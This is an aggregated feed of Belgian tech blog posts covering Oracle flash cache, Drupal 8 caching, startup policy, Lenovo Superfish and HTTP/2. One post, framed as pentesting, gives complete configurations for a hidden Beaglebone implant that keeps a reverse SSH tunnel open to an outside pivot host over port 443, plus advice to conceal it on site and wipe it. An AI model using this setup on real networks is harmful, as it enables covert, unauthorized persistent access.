SQL> startup
ORACLE instance started.

Total System Global Area 4932501504 bytes
Fixed Size		    2934456 bytes
Variable Size		 1023412552 bytes
Database Buffers	 3892314112 bytes
Redo Buffers		   13840384 bytes
Database mounted.
Database opened.

SQL> show parameters flash

NAME				     TYPE	 VALUE
------------------------------------ ----------- ------------------------------
db_flash_cache_file		     string	 /dev/sdb
db_flash_cache_size		     big integer 1G
db_flashback_retention_target	     integer	 1440

SQL> select * from v$flashfilestat; 

FLASHFILE#
----------
NAME
--------------------------------------------------------------------------------
     BYTES    ENABLED SINGLEBLKRDS SINGLEBLKRDTIM_MICRO     CON_ID
---------- ---------- ------------ -------------------- ----------
	 1
/dev/sdb
1073741824	    1		 0		      0 	 0

You can get more information on configuration and guidelines/tuning here. If you want selective control of which tables can use or will use the Database Smart Flash Cache, you can use the ALTER TABLE command. See here. Specifically the STORAGE clause. By default, the tables are aged out into the flash cache but if you don't want certain tables to be cached you can use the NONE option.

alter table foo storage (flash_cache none);
This feature can really make a big difference in a number of database environments and I highly recommend taking a look at how Oracle Linux and Oracle Database 12c can help you enhance your setup. It's included with the database running on Oracle Linux.

Here is a link to a white paper that gives a bit of a performance overview.

by Wcoekaer-Oracle at February 24, 2015 08:07 PM

Dries Buytaert

5 things a government can do to grow its startup ecosystem

Building a successful company is really hard. It is hard no matter where you are in the world, but the difficulty is magnified in Europe, where people are divided by geography, regulation, language and cultural prejudice. If governments can provide European startups a competitive advantage, that could come a long way in helping to offset some of the disadvantages. In this post, I'm sharing some rough ideas for what governments could do to encourage a thriving startups ecosystem. It's my contribution to the Belgian startup manifesto (#bestartupmanifesto).

  1. Governments shouldn't obsess too much about making it easier to incorporate a company; while it is certainly nice when governments cut red tape, great entrepreneurs aren't going to be held back by some extra paperwork. Getting a company off the ground is by no means the most difficult part of the journey.
  2. Governments shouldn't decide what companies deserve funding or don't deserve funding. They will never be the best investors. Governments should play towards their strength, which is creating leverage for all instead for just a few.
  3. Governments can do quite a bit to extend a startup's runway (to compensate for the lack of funding available in Belgium). Relatively simple tax benefits result in less need for venture capital:
    • No corporate income taxes on your company for the first 3 years or until 1 million EUR in annual revenue.
    • No employee income tax or social security contributions for the first 3 years or until you hit 10 employees. Make hiring talent as cheap as possible; two employees for the price of one. (The cost of hiring an employee would effectively be the net income for the employee. The employee would still get a regular salary and social benefits.)
    • Loosen regulations on hiring and firing employees. Three months notice periods shackle the growth of startups. Governments can provide more flexibility for startups to hire and fire fast; two week notice periods for both incoming and outgoing employees. Employees who join a startup are comfortable with this level of job insecurity.
  4. Create "innovation hubs" that make neighborhoods more attractive to early-stage technology companies. Concentrate as many technology startups as possible in fun neighborhoods. Provide rent subsidies, free wifi and make sure there are great coffee shops.
  5. Build a culture of entrepreneurship. The biggest thing holding back a thriving startup community is not regulation, language, or geography, but a cultural prejudice against both failure and success. Governments can play a critical role in shaping the country's culture and creating an entrepreneurial environment where both failures and successes are celebrated, and where people are encouraged to better oneself economically through hard work and risk taking. In the end, entrepreneurship is a state of mind.

by Dries at February 24, 2015 07:15 PM

Les Jeudis du Libre

Mons, le 19 mars – SonarQube : une autre vision de votre logiciel

Logo SonarQubeCe jeudi 19 mars 2015 à 19h se déroulera la 37ième séance montoise des Jeudis du Libre de Belgique.

Le sujet de cette séance : SonarQube : une autre vision de votre logiciel

Thématique : Qualité|Développement|Outils|Visualisation

Public : Tout public

L’animateur conférencier : Dimitri Durieux (CETIC)

Lieu de cette séance : Campus technique (ISIMs) de la Haute Ecole en Hainaut, Avenue V. Maistriau, 8a, Salle Académique, 2e bâtiment (cf. ce plan sur le site de l’ISIMs, et ici sur la carte Openstreetmap).

La participation sera gratuite et ne nécessitera que votre inscription nominative, de préférence préalable, ou à l’entrée de la séance. Merci d’indiquer votre intention en vous inscrivant via la page http://jeudisdulibre.fikket.com/. La séance sera suivie d’un verre de l’amitié.

Les Jeudis du Libre à Mons bénéficient aussi du soutien de nos partenaires : CETIC, Normation, OpenSides, MeaWeb, NextLab, Phonoid et Creative Monkeys.

Si vous êtes intéressé(e) par ce cycle mensuel, n’hésitez pas à consulter l’agenda et à vous inscrire sur la liste de diffusion afin de recevoir systématiquement les annonces.

Pour rappel, les Jeudis du Libre se veulent des espaces d’échanges autour de thématiques des Logiciels Libres. Les rencontres montoises se déroulent chaque troisième jeudi du mois, et sont organisées dans des locaux et en collaboration avec des Hautes Écoles et Facultés Universitaires montoises impliquées dans les formations d’informaticiens (UMONS, HEH et Condorcet), et avec le concours de l’A.S.B.L. LoLiGrUB, active dans la promotion des logiciels libres.

Description : La qualité d’un logiciel est un sujet qui divise : certains pensent qu’il s’agit d’un surcoût et la voient comme une contrainte, d’autres au contraire pensent qu’il s’agit d’une opportunité et voient la qualité comme un guide de travail. La qualité en général c’est le fait de mettre en place les conditions (organisation, outils, règles, équipe) qui permettront de répondre aux besoins exprimés. Dans le cas d’un développement logiciel, il s’agit de développer les besoins fonctionnels et non-fonctionnels du client. Nous distinguons donc la qualité fonctionnelle (répondre aux besoins fonctionnels) et la qualité non-fonctionnelle (répondre aux besoins non-fonctionnels). On préfère donc opposer au surcoût induit par la qualité le coût induit par le manque de qualité d’un logiciel. On appelle ce manque de qualité logicielle la dette technique.

SonarQube (anciennement Sonar) est un projet open-source qui permet de suivre la qualité des développements logiciels. SonarQube est donc un projet open-source pour l’open-source. En effet, des écosystèmes open-source tels qu’OW2 et Polarsys (Eclipse) l’utilisent pour évaluer la maturité de leurs projets. Contrairement à des analyseurs classiques (par exemple : PMD ou Checkstyle), SonarQube se positionne comme un tableau de bord intégrant d’autres analyseurs et aidant à l’interprétation de leurs résultats.

SonarQube propose un ensemble de vues sur un portefeuille d’applications afin de gérer l’évolution de la dette technique de celles-ci. Pour alimenter ces vues, il s’appuie sur une architecture orientée plugins qui lui permet de supporter plus d’une vingtaine de langage du COBOL au Java en passant par le C# ou encore le PHP. L’API pour le développement de plugin est open-source. Il est donc possible d’ajouter des plugins particuliers pour supporter des nouveaux langages, avoir de nouvelles vues ou encore s’interfacer avec des outils existants.

by Didier Villers at February 24, 2015 08:16 AM

February 23, 2015

Frank Goossens

User Agent Madness

Just found this one in my http logfile;

Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

So one User Agent string mentioning 4 browsers (Mozilla, Safari, Chrome and finally Opera 27, which is the actual browser) and 3 rendering engines (Applewebkit, KHTML and Gecko)? There is a lot of web-history in those 127 characters.

by frank at February 23, 2015 06:27 AM

February 22, 2015

Dieter Adriaenssens

Buildtime Trend v0.2 released!

Visualise what's trending in your build process

Buildtime Trend Logo
What started as a few scripts to gain some insight in the duration of stages in a build process, has evolved into project Buildtime Trend, that generates and gathers timing data of build processes. The aggregated data is used to create charts to visualise trends of a build process.

The major new futures are the support for parsing Travis CI build log files to retrieve timing data and the introduction of the project as a service that gathers Travis CI generated timing data, hosts a dashboard with different charts and offers shield badges with different metrics.

Try it out!

The hosted service supports Open Source projects (public on GitHub) running their builds on Travis CI. Thanks to the kind people of Keen.io hosting the aggregated data, the hosted service is currently available for free for Open Source projects.
Get started! It's easy to set up in a few steps.

A bit more about Buildtime Trend

Dashboard example
Dashboard example
Buildtime Trend is an Open Source project that generates and gathers timing data of build processes. The aggregated data is used to create charts to visualise trends of the build process.
These trends can help you gain insight in your build process : which stages take most time? Which stages are stable or have a fluctuating duration? Is there a decrease or increase in average build duration over time?
With these insights you can improve the stability of your build process and make it more efficient.

The generation of timing data is done with either a client or using Buildtime Trend as a Service.
The Python based client generates custom timing tags for any shell based build process and can easily be integrated. A script processes the generated timing tags when the build is finished, and stores the results.
Buildtime Trend as a Service gets timing and build related data by parsing the logfiles of a buildprocess. Currently, Travis CI is supported. Simply trigger the service at the end of a Travis CI build and the parsing, aggregating and storing of the data is done automatically.

The aggregated build data is used to generate a dashboard with charts powered by the Keen.io API and data store.

Check out the website for more information about the project, follow us on Twitter, or subscribe to the community mailing list.

by Dieter Adriaenssens (noreply@blogger.com) at February 22, 2015 08:35 PM

February 20, 2015

Frank Goossens

Music from Our Tube; Ala.ni

Ala.ni appears to be

a London-based singer/songwriter, producer & video director who already worked with such artists as Mary J Blige, Damon Albarn and Andrea Bocelli

While that may sound a lot like your typical name-dropping in a press release of the next would-be-star, her music has a distinct jazzy forties-yet-modern feel to it and above all it’s really beautiful;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Ala.ni will issue an EP in March and the first song from that, Cherry Blossom, is well worth a listen too!

by frank at February 20, 2015 04:03 PM

Wouter Verhelst

LOADays 2015

Looks like I'll be speaking at LOADays again. This time around, at the suggestion of one of the organisers, I'll be speaking about the Belgian electronic ID card, for which I'm currently employed as a contractor to help maintain the end-user software. While this hasn't been officially confirmed yet, I've been hearing some positive signals from some of the organisers.

So, under the assumption that my talk will be accepted, I've started working on my slides. The intent is to explain how the eID middleware works (in general terms), how the Linux support is supposed to work, and what to do when things fail.

If my talk doesn't get rejected at the final hour, I will continue my uninterrupted "speaker at loadays" streak, which has started since loadays' first edition...

February 20, 2015 10:47 AM

February 19, 2015

Dries Buytaert

Making Drupal 8 fly

In my travels to talk about Drupal, everyone asks me about Drupal 8's performance and scalability. Modern websites are much more dynamic and interactive than 10 years ago, making it more difficult to build modern sites while also being fast. It made me realize that maybe I should write up a summary of some of the most exciting performance and scalability improvements in Drupal 8. After all, Drupal 8 will leapfrog many of its competitors in terms of how to architect and scale modern web applications. Many of these improvements benefit both small and large websites, but also allow us to build even bigger websites with Drupal.

More precise cache invalidation

One of the strategies we employ in making Drupal fast is "caching". This means we try to generate pages or page elements one time and then store them so future requests for those pages or page elements can be served faster. If an item is already cached, we can simply grab it without going through the building process again (known as a "cache hit"). Drupal stores each cache item in a "cache bin" (a database table, Memcache object, or whatever else is appropriate for the cache backend in use).

In Drupal 7 and before, when one of these cache items changes and it needs to be re-generated and re-stored (the cache gets "invalidated"), you can only delete a specific cache item, clear an entire cache bin, or use prefix-based invalidation. None of these three methods allow you to invalidate all cache items that contain data of, say, user 200. The only method that is going to suffice is clearing the entire cache bin, and this means that usually we invalidate way too much, resulting in poor cache hit ratios and wasted effort rebuilding cache items that haven't actually changed.

This problem is solved in Drupal 8 thanks to the concept of "cache tags": each cache item can have any number of cache tags. A cache tag is a compact string that describes the object being cached. Thanks to this extra metadata, we can now delete all cache items that use the user:200 cache tag, for example. This means we've deleted all the cache items we must delete, but not a single one more: optimal cache invalidation!

Drupal cache tags

Example cache tags for different cache IDs.

And don't worry, we also made sure to expose the cache tags to reverse proxies, so that efficient and accurate invalidation can happen throughout a site's entire delivery architecture.

More precise cache variation

While accurate cache invalidation makes caching more efficient, there is more we did to improve Drupal's caching. We also make sure that cached items are optimally varied. If you vary too much, duplicate cache entries will exist with the exact same content, resulting in inefficient usage of caches (low cache hit ratios). For example, we don't want a piece of content to be cached per user if it is the same for many users. If you vary too little, users might see incorrect content as two different cache entries might collide. In other words, you don't want to vary too much nor too little.

In Drupal 7 and before, it's easy to program any cached item to vary by user, by user role, and/or by page, and could even be configured through the UI for blocks. However, more targeted variations (such as by language, by country, or by content access permissions) were more difficult to program and not typically exposed in a configuration UI.

In Drupal 8, we introduced a Cache Context API to allow developers and site builders to express these variations and to make them automatically available in the configuration UI.

Drupal cache contexts

Server-side dynamic content substitution

Usually a page can be cached almost entirely except for a few dynamic elements. Often a page served to two different authenticated users looks identical except for a small "Welcome $name!" and perhaps their profile picture. In Drupal 7, this small personalization breaks the cacheability of the entire page (or rather, requires a cache context that's way too granular). Most parts of the page, like the header, the footer and certain blocks in the sidebars don't change often nor vary for each user, so why should you regenerate all those parts at every request?

In Drupal 8, thanks to the addition of #post_render_cache, that is no longer the case. Drupal 8 can render the entire page with some placeholder HTML for the name and profile picture. That page can then be cached. When Drupal has to serve that page to an authenticated user, it will retrieve it from the cache, and just before sending the HTML response to the client, it will substitute the placeholders with the dynamically rendered bits. This means we can avoid having to render the page over and over again, which is the expensive part, and only render those bits that need to be generated dynamically!

Client-side dynamic content substitution

Some things that Drupal has been rendering for the better part of a decade, such as the "new" and "updated" markers on comments, have always been rendered on the server. That is not ideal because these markers are different for every visitor and as a result, it makes caching pages with comments difficult.

The just-in-time substitution of placeholders with dynamic elements that #post_render_cache provides us can help address this. In some cases, as is the case with the comment markers, we can even do better and offload more work from the server to the client. In the case for comment markers, a certain comment is posted at a certain time — that doesn't vary per user. By embedding the comment timestamps as metadata in the DOM with a data-comment-timestamp="1424286665" attribute, we enable client-side JavaScript to render the comment markers, by fetching (and caching on the client side) the “last read" timestamp for the current user and simply comparing these numbers. Drupal 8 provides some framework code and API to make this easy.

A "Facebook BigPipe" render pipeline

With Drupal 8, we're very close to taking the client-side dynamic content substitution a step further, just like some of the world's largest dynamic websites do. Facebook has 1.35 billion monthly active users all requesting dynamic content, so why not learn from them?

The traditional page serving model has not kept up with the increase of highly personalized websites where different content is served to different users. In the traditional model, such as Drupal 7, the entire page is generated before it is sent to the browser: while Drupal is generating a page, the browser is idle and wasting its cycles doing nothing. When Drupal finishes generating the page and sends it to the browser, the browser kicks into action, and the web server is idle. In the case of Facebook, they use BigPipe. BigPipe delivers pages asynchronously instead; it parallelizes browser rendering and server processing. Instead of waiting for the entire page to be generated, BigPipe immediately sends a page skeleton to the the client so it can start rendering that. Then the remaining content elements are requested and injected into their correct place. From the user's perspective the page is rendered progressively. The initial page content becomes visible much earlier, which improves the perceived speed of the site.

We've made significant improvements to the way Drupal 8 renders pages (presentation). By default, Drupal 8 core still implements the traditional model of assembling these pieces into a complete page in a single server-side request, but the independence of each piece and the architecture of the new rendering pipeline enable different “render strategies" to be experimented with — different methods for dynamic content assembly, such as BigPipe, Edge Side Includes, or other ideas for making the most optimal use of client, server, content delivery networks and reverse proxies. In all those examples, the idea is that we can send the primary content first so the client can start rendering that. Then we send the remaining Drupal blocks, such as the navigation menu or a 'Related articles' block, and have the browser, content delivery network or reverse proxy assemble or combine these blocks into a page.

Drupal render pipeline

A snapshot of the Drupal 8 render pipeline diagram that highlights where alternative render strategies can be implemented.

Some early experiments by Wim Leers in Acquia's OCTO show that we can improve performance by a factor of about 2 compared to a recent Drupal 8 development snapshot. These breakthroughs are enabled by leveraging the various improvements we made to Drupal 8.

And much more

But that is not all. The Drupal community has actually done much more, including: complete asset dependency information (which allowed us to ensure zero JavaScript is loaded by default for anonymous users and send less data on AJAX requests), pluggable CSS/JS aggregation and minification (to support more optimal optimization algorithms), and more. We've also made sure Drupal 8 is fast by default, by having better defaults: CSS/JS aggregation enabled, JS assets being loaded from the bottom, block caching enabled, and so on.

All in all, there is a lot to look forward to in Drupal 8!

Special thanks to Acquia's Wim Leers, Alex Bronstein and Angie Byron for their contributions to this blog post.

by Dries at February 19, 2015 07:57 PM

Mattias Geniar

Tearing Down Lenovo’s Superfish Statement

The post Tearing Down Lenovo’s Superfish Statement appeared first on ma.ttias.be.

The last 48 hours have been interesting, given Lenovo has been caught installing Man-in-the-Middle root certificates on newly purchased laptops via spyware known as Superfish.

It's even more interesting now that the private key to that root certificate has been compromised. The password "komodia" tracks back to a known/commercial SSL hijacker.

It's a sign of the bad state IT security is in nowadays. Network switches and routers are intercepted on their way to ISPs to install backdoors, hard disk drives have NSA spyware in their firmware from the factories and now consumer laptops have spyware and man-in-the-middle certificates on them.

If we can't even trust the hardware we use, how are we ever going to be able to trust the software?

But what disturbs me the most in this recent Lenovo scandal, is their most recent news announcement on Superfish.

Superfish was previously included on some consumer notebook products shipped in a short window between September and December ...

This short window means the entire Q4 of 2014. So let's take the numbers published for Q4 2013 from Lenovo. The numbers may be 2 years old, but Lenovo isn't selling any less. So if Q4 2013 resulted in "$4.8 billion in sales (accounting for 51 percent of the Company’s overall sales)", how many laptops do you think those are?

An average selling price of $750 (just a wild guess, it's probably less) would result in a little over 5.630.000 laptops sold.

Diminishing the Superfish impact by saying "included on some consumer notebooks" is a smack in the face.

Superfish has completely disabled server side interactions (since January) on all Lenovo products so that the product is no longer active. This disables Superfish for all products in market.

Oh good. The threat is over.

Except it isn't. The CA certificate is still present on those laptops. The spyware itself is still installed on those machines. Guess what Lenovo, if you can disable it server-side, it can be enabled again server-side as well. You've temporarily disabled part of the problem while ignoring the bigger picture and providing a false sense of security.

Users are given a choice whether or not to use the product.

How is that even remotely true, if it's pre-installed on laptops without prior asking the user?

The relationship with Superfish is not financially significant; our goal was to enhance the experience for users. We recognize that the software did not meet that goal and have acted quickly and decisively.

The primary goal of Superfish was to show ads and inject them into various places. This is most likely the true reason of inserting their own CA certificate, to still inject ads on SSL/TLS-enabled sites.

If the primary goal of an application is to show ads, it's a financial choice. While it may not be financially significant to Lenovo, the choice to embed Superfish was made based on dollars. How much could this make us each month? What would Superfish pay Lenovo? How much money can they gain from this deal?

The only reason the relationship with Superfish existed in the first place, was a financial reason. Nothing else, Lenovo.

In this case, we have responded quickly to negative feedback, and taken decisive actions to ensure that we address these concerns.

This is where Lenovo missed the point entirely. There should never have been a reaction in the first place. They're selling laptops to consumers. That gives them 2 distinct priorities: the laptops should A) work and B) not contain any spyware. I'd love to see B) take priority over A), but for Lenovo A) will come first.

How did Superfish make it through internal reviews at Lenovo? How can any technical engineer feel OK allowing and approving this to be pre-installed on consumer laptops?

The private key for the Superfish certificate is exposed. Out of those 5.630.000 laptops sold, I'd venture a guess that 5.600.000 owners have no clue this happened and will continue to live their lives with a pre-compromised computer. Just making online payments as if nothing happened.

Good work Lenovo. Way to destroy our faith in IT security just a little more.

The post Tearing Down Lenovo’s Superfish Statement appeared first on ma.ttias.be.

by Mattias Geniar at February 19, 2015 07:10 PM

Xavier Mertens

My Little Pwnie Box

BeagleboneAs a pentester, I’m always trying to find new gadgetstools to improve my toolbox. A few weeks ago, I received my copy of Dr Philip Polstra’s book: “Hacking and Penetration Testing with Low Power Devices” (ISBN: 978-0-12-800751-8). I had a very interesting chat with Phil during the last BruCON edition and I was impressed by his “lunch box“. That’s why I decided to buy his book.

This post is not a review of Phil’s book (here is one). It’s just a wrap-up about my own “little pwnie” box setup. The book is based on the Beaglebone hardware. It’s a credit-card-sized computer that can run Linux (amongst other operating systems) and which has plenty of I/O. Much more powerful than the classic Raspberry, its size and the fact that it can be easily be powered via USB, batteries or a regular power adapter (the book has a chapter dedicated to powering the Beaglebone) makes it a very nice choice to build a pentesting device. The primary goal of such small computer is to be dropped discreetly somewhere to open a door on your target’s network. If a Beaglebone has enough power to perform basic tasks during a pentest engagement, don’t expect to run a distribution like Kali on such hardware! That’s why Phil maintains his own distribution dedicated to the Beaglebone platform: The Deck. As described on the website, add-ons are available to extend the capabilities like using 802.15.4 networking or using drones for aerial capabilities (AirDeck) like my Aircrack-One project.

I did not used Phil’s distribuiton because I like to build things by myself and to understand how it works. I setup my own Beaglebone from scratch. The base OS is a Ubuntu 14.04-LTS compiled for the ARM processor. The procedure is avaiable on ARMhf.com. Then I installed my favourite tools eg:

As Phil explains in the book, some tools are available as standard packages and a simple “apt-get install xxx” will do the job. Others must be compiled. My recommendation is to install the source code via github.com (or any other repository service) and compile it on the Beaglebone. Even if the tool is available as a package, there are always differences. Nmap is a good example: Much more NSE scripts are available in the repository. Why truecrypt? Because the Beaglebone will be dropped in an hostile environment. It’s a good idea to store all your collected data and evidences in an encrypted contained.

Aircrack-ng works perfectly with my AWUS036NH wireless card (a good old standard card for pentesters) but my primary goal is not to use my Beaglebone for wireless pentests. I’m the happy owner of a Pineapple for this purpose! My goal is to build a box that can be dropped somewhere, connected on a network and phone home. This is not covered in Phil’s book, so here are my contribution.

I’ve a Huawei 3G USB stick with a data-only card. This HSDPA modem is recognised out-of-the-box by most Linux distribution. It’s the same for the Beaglebone:

[ 16.364815] usb 2-1: new high-speed USB device number 3 using musb-hdrc
[ 16.524132] usb 2-1: device v12d1 p1001 is not supported
[ 16.529904] usb 2-1: New USB device found, idVendor=12d1, idProduct=1001
[ 16.529919] usb 2-1: New USB device strings: Mfr=2, Product=1, SerialNumber=0
[ 16.529929] usb 2-1: Product: HUAWEI Mobile
[ 16.529939] usb 2-1: Manufacturer: HUAWEI Technology

To manage dialup connection, Ubuntu has the Network-Manager but I did the choice to not install a GUI on my Beaglebone. The de-facto tool to manage dialup connection from the command line is wvdial. I remember how it was a nightmare in the ’90s to configure PPP. wvdial takes care of this for you. To test if your modem is compabitle, simple use wvdialconf:

root@beagle:/etc# wvdialconf /etc/wvdial.conf
Editing `/etc/wvdial.conf'.

Scanning your serial ports for a modem.

Modem Port Scan<*1>: S0 S1 S2 S3 
ttyUSB0<*1>: ATQ0 V1 E1 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 Z -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB0<*1>: Modem Identifier: ATI -- Manufacturer: huawei
ttyUSB0<*1>: Speed 9600: AT -- OK
ttyUSB0<*1>: Max speed is 9600; that should be safe.
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 2400 baud, next try: 9600 baud
ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 9600 baud, next try: 9600 baud
ttyUSB1<*1>: ATQ0 V1 E1 -- and failed too at 115200, giving up.
ttyUSB2<*1>: ATQ0 V1 E1 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 Z -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB2<*1>: Modem Identifier: ATI -- Manufacturer: huawei
ttyUSB2<*1>: Speed 9600: AT -- OK
ttyUSB2<*1>: Max speed is 9600; that should be safe.
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK

Found a modem on /dev/ttyUSB0.
Modem configuration written to /etc/wvdial.conf.
ttyUSB0<Info>: Speed 9600; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
ttyUSB2<Info>: Speed 9600; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"

Then edit your configuration to match your mobile operator requirements. Mine looks like this:

[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = AT+CGDCONT=1,"IP","<your_apn>"
Modem Type = Analog Modem
Baud = 115200
New PPPD = yes
Modem = /dev/ttyUSB0
ISDN = 0
Phone = *99#
Password = <your_apn_password>
Username = <your_apn_username>
Check Def Route = yes
Auto Reconnect = yes

The important information is in bold. The next step is to fire the 3G connection at boot time. It’s easy with Ubuntu, add the following lines in your /etc/network/interfaces file:

auto ppp0
iface ppp0 inet wvdial

At this point, my 3G USB modem connected but one problem remained: If the Ethernet interface was already up with a default gateway, no new default route was added via the ppp0 interface. To fix this, the following file has to be modified: /etc/ppp/peers/wvdial:

noauth
name wvdial
usepeerdns
defaultroute
replacedefaultroute

Now that the Beaglebone is connected to the world, it is not yet very useful because we don’t know how to reach it. There are chances that, using a 3G/4G network, it received a RFC198 IP address and connects to the Internet via NAT. The best way is to use SSH to connect to a host and setup a reverse shell. Another key requirement is the “persistence” (like a real malicious program). We must be sure that the SSH session will remain available all the time. To achieve this, there exist a tool called “autossh” which takes care of this. Once the standard package installed, create a configuration file /etc/init/autossh.conf:

# autossh startup Script

description "AutoSSH Daemon Startup"

start on net-device-up
stop on runlevel [01S6]

respawn
respawn limit 5 60 # respawn max 5 times in 60 seconds

script
export AUTOSSH_PIDFILE=/var/run/autossh.pid
export AUTOSSH_POLL=60
export AUTOSSH_FIRST_POLL=30
export AUTOSSH_GATETIME=0
export AUTOSSH_DEBUG=1
autossh -M 0 -4 -N -R 2222:127.0.0.1:22 -o "ServerAliveInterval 60" -o "ServerAliveCountMax 3" -o BatchMode=yes -o StrictHostKeyChe
cking=no -i /root/.ssh/id_rsa -p 443 user@pivot-host
end script

What does it do? A SSH session will be opened to the machine “pivot-host” with the login “user“. The authentication is performed with the private key stored in /root/.ssh/id_rsa (don’t forget to copy the public key on ‘pivot-host’). Change the default port (22) to something more stealthy, personally, I like to do SSH over TCP/443 which is often open to the Internet. The reverse shell is created with “-R 2222:127.0.0.1:22“. It means that a connection to port 222 on pivot-host will be forwarded to the loopback interface of the Beaglebone port 22.

Connect the 3G USB stick, boot the Beagle and a few seconds later, you’ll get a reverse shell opened on your pivot host. You are ready to connect back to the Beaglebone:

root@pivot:/tmp# netstat -anp|grep 2222
tcp 0 0 0.0.0.0:2222 0.0.0.0:* LISTEN 20549/sshd: xavier
tcp6 0 0 :::2222 :::* LISTEN 20549/sshd: xavier
root@pivot:/tmp# ssh -p 2222 user@127.0.0.1
user@127.0.0.1's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.14.4.1-bone-armhf.com armv7l)

* Documentation: https://help.ubuntu.com/
Last login: Wed Feb 18 20:58:43 2015 from mclt0040-eth0.home.rootshell.be
xavier@beagle:~$

Now drop your Beaglebone in a nice place at your target’s location like a meeting room, behind a computer (and use one USB port to power it) and walk away… Happy hunting! One last tip: when your micro SD card is ready, make a copy of it to easily re-install new Beaglebones. They are cheap and can be left onsite after your engagement. Just bill it to your customer. If you leave it onsite, be sure to have a suicide-script to wipe the data on the SD card!

by Xavier at February 19, 2015 03:02 PM

February 18, 2015

Frank Goossens

Wanted: testers for WP YouTube Lyte (the one with the new YT API)

As I wrote a couple of weeks ago, YouTube is shutting down their old v2 API, forcing WP YouTube Lyte to swith to v3. The main change; users will have to get an API key from Google and provide that in the Lyte settings page.

Initial development & testing has been done (this blog switched already) and I now need some brave souls to test this. You can download the “beta” from https://downloads.wordpress.org/plugin/wp-youtube-lyte.zip and report back here or on the wordpress.org support forum about how that did or did not work for you.

Looking forward to having to fix some nasty bugs until everything will finally be in it’s right place once again ;-)

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at February 18, 2015 04:25 PM

Mattias Geniar

HTTP/2 Specification Is Final

The post HTTP/2 Specification Is Final appeared first on ma.ttias.be.

February 18th, 2015. A day that, for better or worse, will change the internet.

The IESG has formally approved the HTTP/2 and HPACK specifications, and they’re on their way to the RFC Editor, where they’ll soon be assigned RFC numbers, go through some editorial processes, and be published.
mnot.net

This means HTTP/2 has been finalised and the spec is ready to be implemented.

Here are a few things to read up on, in case you're new to the HTTP/2 protocol.

I for one am happy to see HTTP/2 be finalised. There are some really good parts about the spec. Yes, it's lacking in some areas -- but it's by far an improvement over the HTTP/1.1 spec.

The post HTTP/2 Specification Is Final appeared first on ma.ttias.be.

by Mattias Geniar at February 18, 2015 07:05 AM

February 17, 2015

Claudio Ramirez

Build the Padre development tree using local::lib on Debian/Ubuntu

catThanks to the great job of Kaare Rasmussen (kaare) and Kevin Dawson (bowtie) moving the Padre repository from a stalled svn/trac setup to github (and keeping the repo alive), hopefully the development can be rebooted.

I posted a small howto about setting and development environment to hack on Padre (svn), but it’s already outdated due to the new libraries that Linux distros now package (gtk3, wx 3.0.1, etc.). The fastest way I found to setup a Padre environment is using local::lib (https://metacpan.org/pod/local::lib).

Because recent Linux distributions have recent Perl and Padre packages, you won’t be working with ancient packages. E.g., Ubuntu 14.10 comes with Perl 5.20.1 and Padre 1.0 (this is also valid for Debian Testing/Unstable). Kudos to the Debian Perl Group (https://pkg-perl.alioth.debian.org/).

These instructions are provided for building an development environment to hack on Padre itself or to keep track of the most recent changes on github.

These are the step to get Padre fromgithub:

  • Get the OS dependencies. The easieast way is just to install the packaged padre. Its dependencies include local::lib:
    $ sudo apt-get install padre

The OS-packaged Padre can of course be starting by just typing:

$ padre

  • Get development dependencies for Padre:
    $ cpanm -l ~/perl5 Module::Install
  • Install Padre and dependencies:
    $ cpanm -l ~/perl5 .
  • Run Padre:
    – in dev mode:
    $ ./dev
    - or the local::lib installed app:
    $ ~/perl5/bin/padre

Filed under: Uncategorized Tagged: github, local::lib, Padre, Perl

by claudio at February 17, 2015 10:16 PM

Mattias Geniar

Async MySQL Calls in HHVM 3.6

The post Async MySQL Calls in HHVM 3.6 appeared first on ma.ttias.be.

HHVM keeps getting better.

Long-awaited MySQL support for async functions in Hack! Hack’s async functions allow an application to continue executing code while fetching data, which can dramatically reduce the time it spends waiting for IO. We blogged a few weeks ago about async curl support, and with 3.6, MySQL will be usable with Hack’s async functions as well.
HHVM blog

After their async curl support announcement, it's time for a really impressive feature: async MySQL calls. Imagine having the ability to fire of multiple queries to multiple SQL servers in parallel.

While it's not exactly a drop-in replacement for PHP, HHVM can be a real candidate to consider if you're working on large-scale PHP projects.

The post Async MySQL Calls in HHVM 3.6 appeared first on ma.ttias.be.

by Mattias Geniar at February 17, 2015 10:08 PM

Giving HTTPie a Chance

The post Giving HTTPie a Chance appeared first on ma.ttias.be.

Maybe it's time to give ye ol' curl some competition.

Just a normal tweet. A random thought, and you throw it out there into the world. The best part? Reactions!

Let's say Tim is right. I'll give HTTPie a shot.

In any case, the coloured output is a lot easier to digest. Now to get my hands on the syntax and the arguments -- and the fact that curl's options have been hardwired into my brain for the last years.

httpie_vs_curl

Good luck HTTPie, you're fighting against years of curl love for me. But I'll give you the chance you deserve.

The post Giving HTTPie a Chance appeared first on ma.ttias.be.

by Mattias Geniar at February 17, 2015 10:00 PM

Sébastien Wains

